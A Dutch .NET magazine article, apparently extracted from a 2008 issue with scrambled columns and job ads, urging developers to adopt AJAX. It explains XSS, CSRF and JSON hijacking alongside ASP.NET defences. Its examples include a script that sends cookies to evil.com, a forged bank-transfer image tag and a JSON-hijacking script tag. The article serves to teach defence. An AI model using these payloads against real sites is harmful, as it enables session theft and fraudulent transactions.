AJAX niet meer weg te denken by zwj23860

VIEWS: 15 PAGES: 6

									             Techniek
AJAX niet meer weg te denken
             In dit artikel laten we de niet-overtuigde ontwikkelaar zien dat het gebruik
             van JavaScript en AJAX de moeite waard is en zeer veel toegevoegde waarde
             biedt. Met als ondersteuning goedbeargumenteerde en gepassioneerde
             (code)voorbeelden.


Het gebruik van AJAX in               gebruik van patterns, als prototype en intercep-    kende feature in Visual Studio tot dusver. Met
webapplicaties is de laatste tijd in populariteit  tor, zeer succesvol toegepast. Het framework is    de komst van Visual Studio 2008 behoort dit
toegenomen. Hierdoor wordt kennis van Java-     zeer stabiel en biedt veel mogelijkheden (zowel    tot het verleden. JavaScript intellisense in Visual
Script belangrijker. Toch bestaat er weerstand    server- als client-centric).              Studio 2008 omvat: keyword-ondersteuning, de
tegen JavaScript. Ontwikkelaars die werken in                                types van de variabelen worden achterhaald en
C# of VB.NET zijn gecharmeerd van design       Weerstand                       getoond, ondersteuning van methodes en pro-
patterns en Software Factories. Een non-type-    Wij hebben altijd de mening gehad dat Java-      perties ongeacht of deze zich inline in de pagina
safe scripttaal steekt daar nogal bleek bij af.   Script helpt ons doel, een gebruiksvriendelijke    bevinden of in externe scriptbestanden waarnaar
Asynchronous JavaScript And XML – tegen-       webapplicatie, te bereiken. Met de komst van
woordig is AJAX veel meer dan de titel zegt.     AJAX, en met name het ASP.NET AJAX
Eigenlijk betekent AJAX momenteel gebruiks-
vriendelijkheid in webapplicaties. De ‘X’ van XML
                           Framework1, vinden wij dan ook dat iedere
                           (Microsoft) Webontwikkelaar niet meer om
                                                      Maar XSS kan wel
zouden we beter kunnen vervangen door een      JavaScript (lees AJAX) heen kan. In de samen-     degelijk een groot
verwijzing naar JSON, het lichte data-interchange  werking met C#- en VB.NET-ontwikkelaars
formaat. JSON wordt standaard gebruikt voor de    is ons opgevallen dat de meesten niets met        gevaar betekenen
communicatie tussen JavaScript en een AJAX-     JavaScript te maken willen hebben. De redenen
endpoint. Het is eenvoudig te begrijpen en biedt   hiervoor verschillen, maar de meest gehoorde
een volledig taalonafhankelijk tekstformaat.     argumenten zijn:                    verwezen is in de pagina. JavaScript coderen gaat
Het gebruikt conventies die bekend zijn voor     - lastig te debuggen                  in Visual Studio 2008 dus net zo gemakkelijk als
ontwikkelaars die werken met de C-familie van    - geen intellisense                  het schrijven van C# of VB.NET
ontwikkeltalen, zoals C, C++, C# en Java. De ’J’   - security slecht
van JavaScript spreekt voor zich. JavaScript is nu  - browser-versie compatibiliteit.           Security
eenmaal dé manier om applicaties in een browser                               Security is een veel voorkomende angst van
gebruiksvriendelijker te maken.           JavaScript debugging                  ontwikkelaars en opdrachtgevers wanneer we
JavaScript is daarmee een programmeertaal      Op het gebied van debugging heeft JavaScript een    verantwoordelijkheden van de server ver-
voor algemeen gebruik, ontworpen om pro-       achterstand goed te maken. Hoewel debuggen van     plaatsen naar de client. In onze ogen is dit een
grammeurs van alle competentieniveaus het ge-    JavaScript in eerdere versie van het .NET Frame-    onderwerp dat uitleg verdient. Dit onderwerp
drag van softwareobjecten te laten controleren.   work mogelijk was, bleek het niet krachtig en     wordt vaak gebruikt om het toepassen van
Vandaag de dag wordt JavaScript vooral        intuïtief genoeg. Firebug gold als een veel gebruikt  AJAX van tafel te vegen zonder de details te
gebruikt in webapplicaties, waarvan de objecten   alternatief, maar werkt alleen met Firefox.      onderkennen.
een grote variëteit aan HTML-objecten van      Met de komst van Microsoft Visual Studio
een webpagina en natuurlijk de pagina zelf      2008 (VS2008) heeft er een grote verbete-       Aan wat voor securityproblemen moeten we
representeren. Als grote voordeel geldt dat     ring plaatsgevonden: JavaScript-debugging       denken bij gebruik van AJAX?
de gebruiker de webapplicatie interactief kan    is nu standaard beschikbaar. Het zetten van      - Cross site Scripting (XSS of CSS)
gebruiken, omdat de applicatie de pagina niet    breakpoints, (deep) watch, locals, call stack     - Cross-site request forgery (CSRF of XSRF)
naar de server hoeft te posten            en on-the-fly uitvoeren van code is allemaal      - JSON Hijacking
                           mogelijk, zodra je in Internet Explorer disable
JavaScript binnen Microsoft             JavaScript debugging uitvinkt. Niet alleen       Natuurlijk bestaan er meer veiligheidsoverwe-
Volgens Nikhil Kothari (van de ASP.NET        inline-JavaScript, maar ook externe libraries en    gingen, maar dit zijn echte AJAX-veiligheids-
productgroep) heeft het .NET Framework-       .js-bestanden worden ondersteund.           kwesties.
team van Microsoft zich net als de rest van de
wereld schuldig gemaakt aan het ‘hacken’ met     Intellisense
JavaScript tot de komst van het ASP.NET       Binnen Visual Studio zijn .NET-ontwikkelaars
                                                      1. Cross Site Scripting
AJAX Framework. Pas op dat moment zijn zij      verwend met het gebruik van intellisense. Dit       (XSS)
zich er echt in gaan verdiepen waar JavaScript    gemak valt helemaal op bij het schrijven van
nu precies voor staat en waar het goed in is.    JavaScript. Dan merken we pas hoe enorm        We kennen allemaal de voorbeelden van het
In het ASP.NET AJAX Framework wordt het       gemakkelijk intellisense is. Dit was een ontbre-    invoegen van JavaScript of sql statements in een                                        .NET magazine | nummer 22 2008                       51
                                            the one-stop company for .NET development


4DotNet is op zoek naar een

 Microsoft .NET Developer (medior)
Ben jij een ambitieuze, ervaren ontwikke-  Onze professionele trainingen in onze
laar, die met ons de uitdaging wil     trainingscentra Meppel en Utrecht staan
aangaan om het maximale uit jouw      tot je beschikking.
capaciteiten te halen? Neem dan direct
contact met ons op voor een afspraak.    º Uitstekend salaris
                      º Leaseauto met klasse, merk naar keuze
Wie zijn wij?:               º Laptop en mobiele telefoon
4DotNet is een onderneming voor       º Bonus bij het behalen Microsoft
ambitieuze ontwikkelaars. Door onze      certificeringen
specialisatie in Microsoft Development
Tools en Microsoft .NET behoren onze    Wat vragen wij:
medewerkers tot de top van Nederland.    º Een zelfstandige werkhouding
Onze klanten ondersteunen wij met      º Ambitie en leergierigheid               Geïnteresseerd?
trainingen gegeven door onze Microsoft   º Analytisch vermogen                  Neem dan contact op met Edgar Tichelaar,
gecertificeerde trainers, detachering,   º HBO / WO                        0522-24 14 48 of e-mail je CV naar EdgarT@4dotnet.nl
consultancy, maatwerk, onderhoud en     º Ervaring met projecten binnen het           voor een vrijblijvend gesprek over jouw carrière
een gratis helpdesk.             Microsoft .NET Framework
                      º Ruime ervaring met Visual Studio, C# of
                                                   mogelijkheden.
Wat bieden wij?:               VB.NET, ASP.NET, SQL
Een uitstekend salaris met prima
secundaire arbeidsvoorwaarden en een    Pre's
uitdagende functie in een informele     º Kennis van XML, Team Foundation
no-nonsense cultuur. Daarbij krijg je     Server
uitstekende mogelijkheden om jezelf     º Een of meer Microsoft (MCAD MCSD
verder te ontwikkelen en te certificeren.   MCTS MCPD of MCT) certificeringen.
                                                                   Verleng uw abonnement op
                                            Microsoft .Net Magazine


                                                                   Wilt u het .Net magazine
                                            Just refreshed


                                            .net
                                                                                /netjesgeregeld
                                                                   blijven ontvangen?
 Microsoft .Net Magazine                                even                                  microsoft.nl
 Just refreshed
                                            spannender
 .net
 even
 actuelerWilt u het .Net magazin
            e
blijven ontvangen?
Verleng uw abonnemen
            t op
microsoft.nl/netjesge
             regeld
textbox op een webpagina om na te gaan of de
                                                     <%@ Page Language=”C#”
ontwikkelaar iets gedaan heeft aan het tegen-                               validateRequest=”true”
gaan van SQL Injection of Cross Site Scripting
(XSS). In het geval van XSS is het bekende                                CODEVOORBEELD 4
voorbeeld het plaatsen van de volgende string in
een textbox en het klikken op de submit-knop.                              Wanneer validateRequest op true staat (stan-
                                                     daard), zal XSS niet werken. Bij uitvoeren van
 <script>alert(‘xss’);</script>
                                                     de voorbeelden verschijnt de melding die je ziet
                                                     in afbeelding 3.
CODEVOORBEELD 1                   AFBEELDING 2. INHOUD COOKIE BEKENDE WEBSITEStel: op een website is de functionaliteit aanwe-  te injecteren, is het theoretisch mogelijk een
zig om naar boeken te zoeken. Het is mogelijk    nieuw loginscherm te plaatsen en de gegevens
een zoekterm in te voeren, de website toont de   naar de aanvaller te sturen. De mogelijkheden
zoekterm bij het resultaat.             zijn eindeloos, omdat een aanvaller gebruik kan
Wanneer we de bekende test doen, kan dat      maken van alle faciliteiten die JavaScript en
het resultaat opleveren die je terugvindt in    HTML hem bieden.
afbeelding 1.
                          Dit soort scenario’s zullen echter alleen de aan-
Het doel van een XSS-aanval is om geïnjec-     valler zelf benadelen, het is immers zijn brow-
                          ser waar deze aanvallen op plaatsvinden. Om     AFBEELDING 3. A POTENTIALLY DANGEROUS REQUEST.
                          echt schade te doen, zal hij een manier moeten    FORM VALUE WAS DETECTED FROM THE CLIENT
                          vinden om andere gebruikers deze technieken
                          uit te laten voeren. Dit is mogelijk door middel   Het is dan ook geen goed idee om deze di-
                          van reflected XSS en stored XSS.           rective op false te zetten. Denk goed na of dit
                                                     echt is wat je wilt, mocht het ooit noodzakelijk
                          Reflected XSS                     zijn. Zorg er in ieder geval voor om bij alle
                          De eerste methode is Reflected XSS. Dit houdt     gebruikersinvoer gebruik te maken van Server.
                          in dat de te injecteren content als QueryString   HtmlEncode, zodat mogelijk onveilige karak-
                          in een URL wordt meegegeven. De gebruiker      ters onschadelijk worden gemaakt met behulp
                          (slachtoffer) wordt dusdanig voor de gek te      van hun HTML-encoded equivalenten.
                          houden dat hij/zij op de link klikt.
AFBEELDING 1. RESULTAAT CROSS SITE SCRIPTING
                                                     string searchTerm = Server.
                                                     HtmlEncode(TextBox1.Text);
                           http://boekhandel.nl/zoek.aspx?zoekterm=<s
teerde code op de aangevallen site uit te voeren.  cript>alert(‘xss’);</script>
In het voorbeeld ongevaarlijk, omdat het een                               CODEVOORBEELD 5
dialoog toont. Maar XSS kan wel degelijk een    CODEVOORBEELD 3
groot gevaar betekenen. Wat te denken van het
stelen van cookies? Laten we deze site nogmaals   Om een slachtoffer zover te krijgen op deze link
                                                     2. Cross-site request
‘aanvallen’, alleen ditmaal met de volgende     te klikken maakt men gebruik van ‘social engi-     forgery (CSRF)
zoekterm:                      neering’ (psychologische trucs). Bijvoorbeeld
                          een e-mail met de boodschap dat iemand iets     Cross-site request forgery geldt als een lastig aan
                          gewonnen heeft en op de link moet klikken om     te pakken fenomeen en kan in combinatie met
 <script>document.location=’http://evil.
 com/collector.php?cookie=’ + document.coo-
                          de prijs ook daadwerkelijk te krijgen.        Cross site scripting een groot gevaar vormen.
 kie</script>                                              Het is zo lastig aan te pakken omdat het verzoek
                          Stored XSS                      wordt uitgevoerd onder de naam van het slacht-
CODEVOORBEELD 2                   Bij Stored XSS zal de aanvaller zelf het kwaad-   offer. Je kunt dus niet aan het verzoek zien dat
                          willige script in een webpagina opslaan. Alle    het niet klopt. Zoals bij XSS al duidelijk werd, is
Wanneer de browser nu de pagina rendert,      bezoekers van de aangevallen site worden er de    het mogelijk om sessions of cookies te stelen en
stuurt de JavaScript-code de inhoud van de     dupe van. Een aanvaller kan elke site gebruiken   je voor te doen als een ander persoon. Bij CRSF
huidige cookie naar evil.com, zonder dat iemand   waarbij hij zelf teksten of plaatjes toevoegt, zo-  doet de hacker zich ook voor als het slachtoffer.
het doorheeft. Doordat het niet ongewoon      als een wiki of een blog met commentaar. Het     Dit is alleen mogelijk wanneer het slachtof-
is om sessionid’s en authenticatie tokens in    spreekt voor zich dat deze methode gevaarlijker   fer twee verschillende sites tegelijk open heeft,
cookies op te slaan, bestaat de mogelijkheid dat  is dan reflected XSS, omdat het geen social      bijvoorbeeld een forum en een website van een
de aanvaller zich door een succesvolle cookie-   engineering nodig heeft en het slachtoffer alleen   bank. Het slachtoffer is ingelogd op de website
diefstal uit kan geven voor de gedupeerde (zie   de site hoeft te bezoeken.              van de bank en heeft tevens het forum openstaan
afbeelding 2).                                              in een ander browservenster. Op de forumpagina
                          ASP.NET oplossing                  bevindt zich de volgende afbeelding:
De aanvaller beschikt over nog meer interes-    Het is voor de XSS-aanvallers van ASP.NET-
                                                     <img src=http://www.bank.com/manageac-
sante mogelijkheden. Doordat XSS gebruikt      websites niet meer zo eenvoudig. In ASP.NET      count.aspx?transferTo=123&amount=1000 />
kan worden om zowel JavaScript als HTML       kennen we de validateRequest Page Directive:
                                                     CODEVOORBEELD 6
                                       .NET magazine | nummer 22 2008                       53
                JavaScript is
              steeds makkelijker toe te passen
Bij het opvragen van de afbeelding vindt er op                              die gerealiseerd zijn met het ASP.NET AJAX
                           Function Array()
de site van bank.com een transfer plaats van     {
                                                     framework accepteren alleen webservice calls
1000 euro naar bankrekening 123. Daarbij         var copyOfArray = this;             vanuit JavaScript die voorzien zijn van een header
wordt het gevalideerde authenticatie cookie van                             met content type application/json. Dit wordt ge-
                             var sendArray = function()
het slachtoffer gebruikt.                 {
                                                     realiseerd door het framework aan de client-kant
                              //Stuur array naar de hacker         (zie codevoorbeeld 9). Wanneer er een verzoek
Geen diefstal dus van de cookie of een session      }                       vanuit een scripttag wordt verstuurd, zal het
maar tijdelijk gebruik ervan om een actie uit te     // Wacht even met het aanroepen van de
                                                     niet het content-type application/json bevatten,
voeren. Je begrijpt dat de kans dat je slachtoffer     sendArray function zodat je zeker       waardoor de webservice het verzoek negeert.
van CSRF wordt erg klein is, omdat je twee ver-      // dat er een volledige kopie van de
                             array is gemaakt.
schillende sites open moet hebben staan. En de      setTimeout(sendArray,100);           // Create a web request to make the method
hacker moet toevallig ook jouw bank aanvallen.    }                          call
De eindgebruiker kan CSRF dus simpelweg                                  var request = new Sys.Net.WebRequest();

voorkomen door bijvoorbeeld bankzaken alleen    CODEVOORBEELD 8
                                                     request.get_headers()[‘Content-Type’] =
te regelen met maar één browsertab open. De                                ‘application/json; charset=utf-8’;
oplossing voor CSRF die een ontwikkelaar kan    (stap 3) van onlinestore.com. Deze aanroep geeft
toepassen, bespreken we hierna.           een JSON array terug (stap 4).            CODEVOORBEELD 9
                          Doordat in de HTML-pagina van jsonhijack.
                          com de function Array wordt overschreven, zal    Daarnaast zijn alle ter beschikking staande web-
3. JSON Hijacking                  de javascript interpreter deze aanroepen om de    methods door middel van het ASP.NET AJAX
De term JSON Hijacking kom je veel tegen      JSON Array te verwerken. Binnen deze functie     framework standaard alleen te benaderen met
bij AJAX Security. Scott Guthrie (corporate     maakt de hacker een kopie van de JSON Array     de HTTP POST-opdracht. Aanroepen vanuit
vice president van Microsoft’s .NET Developer    en stuurt deze door naar de website van de      JavaScript worden uitgevoerd met de HTTP
Division) heeft er een post aan gewijd om te    hacker (stap 5).                   GET-opdracht, zoals te zien in codevoorbeeld
bewijzen dat het ASP.NET AJAX framework                                 10. Een ontwikkelaar kan er voor kiezen een
een oplossing biedt voor dit securityprobleem2.   JSON Hijacking is een serieus beveiligingsrisico.  webmethod wel beschikbaar te stellen voor
JSON Hijacking is een beveiligingsprobleem     De kans dat een eindgebruiker hiervan slachtoffer   HTTP GET-verzoeken, maar dan moet hij ex-
dat veel overeenkomsten vertoont met Cross-     wordt blijft echter beperkt, omdat de eindgebrui-  pliciet een attribuut boven de webmethod zetten.
site request forgery. JSON Hijacking bestaat    ker minstens twee websites open moet hebben
uit twee onderdelen, namelijk een manier om     staan, waarvan één kwaadwillende. En deze dient
                                                     [WebMethod]
ongemerkt een AJAX-endpoint (bijvoorbeeld      ook nog een aanroep te doen naar de andere web-    public string[] GetHistory()
een AJAX enabled webservice) te benaderen en    site waar de eindgebruiker is ingelogd. De kans    {
                                                       //Method te benaderen met HTTP POST
een manier om de binnenkomende JSON array      dat de kwaadwillende website een aanroep doet
                                                     verb
(geordende collectie van waardes) te verzenden   naar de website waar de eindgebruiker dan ook     }
naar een hacker.                  toevallig is ingelogd, is klein maar voor bepaalde
                                                     [WebMethod]
Een manier om ongemerkt een Ajax-endpoint      toepassingen niet te verwaarlozen.
                                                     [ScriptMethod(UseHttpGet = true)]
te benaderen, is door gebruik te maken van de    Omdat JSON Hijacking volledig wordt          public string[] GetHistory()
volgende javascripttag:               uitgevoerd vanaf de website van een hacker en     {
                                                       //Method te benaderen met HTTP GETT
                          je daar geen invloed op kan uitoefenen, dien je
                                                       verb
                          de oplossing te zoeken bij de bouw van je eigen    }
 <Script src=”http://www.onlinestore.com/
 storeinfo/getHistory.ashx” ></Script>       webservice. Dit geldt ook voor CSRF. Micro-
                          soft heeft hier een oplossing voor: Webservices   CODEVOORBEELD 10

CODEVOORBEELD 7

                                                     Dit betekent dus dat Microsoft twee manieren
Wanneer deze aanroep een JSON array terug-                                heeft om ontwikkelaars van AJAX-enabled
geeft, moet deze nog doorgestuurd worden naar                              websites te beschermen tegen JSON Hijacking.
de hacker. Dit doe je door de JavaScript-functie                             We hebben nu een drietal beveiligingsproble-
Array() te overschrijven. In codevoorbeeld 2 is                             men besproken die allemaal te verhelpen zijn.
te zien hoe dit gaat.                                          Wij willen alle beginnende AJAX-ontwikke-
                                                     laars er dan ook bewust van maken dat AJAX
In afbeelding 4 is schematisch te zien hoe                                de ‘attack surface’ van je applicatie vergroot. Zie
JSON Hijacking verloopt. Stap 1 bestaat uit                               niet alleen de mooie voordelen, maar bedenk
een request naar de website van de hacker. In                              ook welke gaten je eventueel opent. Wanneer je
stap 2 retourneert de server een HTML-pagina                               hier goed rekening mee houdt, is het absoluut
waarin een plaatje is verwerkt die een aanroep   AFBEELDING 4. SCHEMATISCHE WEERGAVE VAN JSON-    mogelijk een veilige AJAX-enabled webap-
doet naar het AJAX endpoint getHistory.ashx     HIJACKING                      plicatie te realiseren. Een tip die regelmatig54                 .NET magazine | nummer 22 2008
         Beveiligingsproblemen goed
           te verhelpen
terugkeert bij beveiligingskwesties, is “valideer   Conclusie                       Links
de input van de gebruiker”. Er zijn specialisten   In dit artikel hebben we een aantal punten be-     1 ASP.NET AJAX
die beweren dat je daarmee 80 procent van het     handeld waarvan wij denken dat zij de belang-      http://www.asp.net/ajax
problemen verhelpt.                  rijkste drempels vormen voor .NET-onwikke-       2 Scott Guthrie: ASP.NET AJAX and JSON-Hijacking
                           laars om geen JavaScript of AJAX te gebruiken.      http://weblogs.asp.net/scottgu/ar-
Browser-versie compatibiliteit            Het web maakt een enorme ontwikkeling door        chive/2007/04/04/json-hijacking-and-how-asp-net-
Bij gebruik van ASP.NET AJAX vormt de         en JavaScript is steeds makkelijker toe te pas-     ajax-1-0-mitigates-these-attacks.aspx
browser waarmee gebruikers je applicatie be-     sen: VS2008 heeft intellisense voor JavaScript
naderen geen echt probleem meer (wat AJAX       en goede debug-functionaliteit toegevoegd. De
betreft).                       beveiligingsproblemen die spelen zijn met het
De volgende browsers worden officieel onder-      ASP.NET AJAX Framework onder de loep
steund:                        genomen en zijn goed te verhelpen. Een ont-
- Microsoft Internet Explorer 6.0 of later      wikkelaar moet gewoon JavaScript gebruiken
- Mozilla Firefox version 1.5 of later        in zijn websites om een bezoeker een prettige
- Opera version 9.0 of later             gebruikerservaring te bieden.
- Apple Safari version 2.0 of later
ASP.NET AJAX detecteert het type browser
van de gebruiker. Afhankelijk van de browser
wordt JavaScript-code uitgevoerd die geschikt                                Dennis van de Laar (dennis.van.de.laar@avanade.
is voor deze specifieke browser.                                       com) en Henry Cordes (henry.cordes@avanade.
                                                       com) zijn solution developer bij Avanade (www.avanade.
                                                       com), een samenwerkingsverband tussen Microsoft en
                                                       Accenture.


                                     (Advertentie)
                                     SPIE
                                     doet meer
                                     voor je!
   Jij wilt het beste uit jezelf halen?
   Wij zorgen dat je de beste opleidingen volgt.
   Als .Net Specialist ben je nooit uitgeleerd. Ontwikkelingen op de voet volgen is een drive die wij verlangen. Daarom
   zorgen wij ervoor dat je maximaal gebruik maakt van onze uitstekende opleidingstrajecten en themasessies. Wij maken
   specialisten in Sharepoint, Bizztalk en het Framework 3.5. Toppers laten wij excelleren. Wil je weten wat SPIE nog meer
   te bieden heeft, kijk op www. SPIE-ICT.nl
                                         .NET magazine | nummer 22 2008                          55
Welke ICT’er komt het betalingsverkeer regelen?

Information Engineer – Junior RUP Specialist
Net als het gewone verkeer moet ook het betalingsverkeer goed geregeld zijn. Equens is een
van de grootste en meest toonaangevende betalingsverwerkers van Europa. Werken bij Equens
betekent dan ook werken met geavanceerde technologie. Samen met collega’s die over een
schat aan kennis en ervaring beschikken, zorg je ervoor dat onze solide IT-systemen voldoen
aan de nieuwste Europese standaarden. Zo kun je je kennis verdiepen en verbreden
en een concrete bijdrage leveren aan onze ambitie om tot de Europese top 3 te behoren.
Jouw toegevoegde waarde zit hem met name in je (nog te ontwikkelen) kennis van RUP.
Profiel: hbo Informatica. Ervaring met Requirements Engineering, RUP en Functional Design.
Bij Equens werk je 4 x 9 uur met een salaris van max. € 51.000 bruto per jaar. Kijk voor meer
informatie op www.werkenbijequens.com
Microsoft .Net Magazine                                       Microsoft .Net Magazine
Just refreshed                                            Just refreshed
.net                                                 .net
even                                                 even
sceptischer                                             lekkerder

                                          Wilt
                                             u
                                         blijv het .N
                                            e      e
                                         Verle n ontv t maga
                                            ng u ange      zine
                                                    n
              zine                         mic
                                               wa
                                                 bon ?
            aga                             roso       nem
          tm
         .Ne en?     t op                           f t.n     ent
       het ang    men       d                          l/      op
     tu
   Wil n ontv bonne         gel                           netj
                  ere                                 esg
                jesg
      e    a                                             ereg
    blijv ng uw
    Ver
      le
           nl/ net                                            eld
            .
          soft
     m  icro

								
To top